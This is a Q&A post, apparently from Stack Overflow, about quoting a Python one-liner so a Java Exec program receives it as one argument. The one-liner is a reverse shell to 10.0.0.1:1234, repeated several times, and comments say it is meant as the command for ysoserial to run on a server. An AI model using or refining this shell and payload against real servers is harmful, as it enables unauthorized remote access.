# Passing Python statements as command line args to Java program

Tags: java, python-2.7, cmdline-args

Given the below `java` code, how can I pass the following `python` statements as argument to the `java` code

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

The java code:

```
import java.io.*;
public class Exec {

    public static void main(String[] args) throws IOException {
        Process p = Runtime.getRuntime().exec(args[0]);
        byte[] b = new byte[1];

        while (p.getErrorStream().read(b) > 0)
            System.out.write(b);
        while (p.getInputStream().read(b) > 0)
            System.out.write(b);
    }
}
```

I execute the java code using:

```
java Exec 'python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);''
```

but it throws `syntax error near unexpected token`('`. If I use double quotes at the beginning and end

```
java Exec "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
```

it throws:

```
  File "<string>", line 1
    'import
          ^
SyntaxError: EOL while scanning string literal
```

Any help is much appreciated.

Answer (score 0):

As you've noted, this is quite confusing. You're trying to pass in everything as one argument and the quoting becomes difficult. If you need explicit arguments, I think you have to pass in three arguments to your Java program, viz:

1. python
2. -c
3. the complete script quoted appropriately

e.g.

```
java Exec python -c "script quoted and escaped properly"
```

but perhaps you could circumvent that by running 'python' and [passing the name of the file containing your script?](https://stackoverflow.com/questions/1027714/how-to-execute-a-file-within-the-python-interpreter) (why do you need to specify 'python' and '-c' - could that be hardcoded in your program?)

Fundamentally, though, why are you using Java to execute a Python program to spawn a bash shell? If you're on the Java platform, I would look at how to achieve what you really want *without* having to fork subprocesses using different technologies.

Comment: There's a reason I'm passing everything as one arg. The `java` code I've written is a sample code that somewhat mimics the code in a 3rd party JAR file. The 3rd party JAR expects `java -jar ysoserial-[version]-all.jar [payload type] '[command to execute]'` - here the command to be executed is what begins with `python -c ...`.

Comment: Thank you Brian for your answer. The reason for doing like this is- I want the python code to be executed by the java code on server (by the 3rd party jar).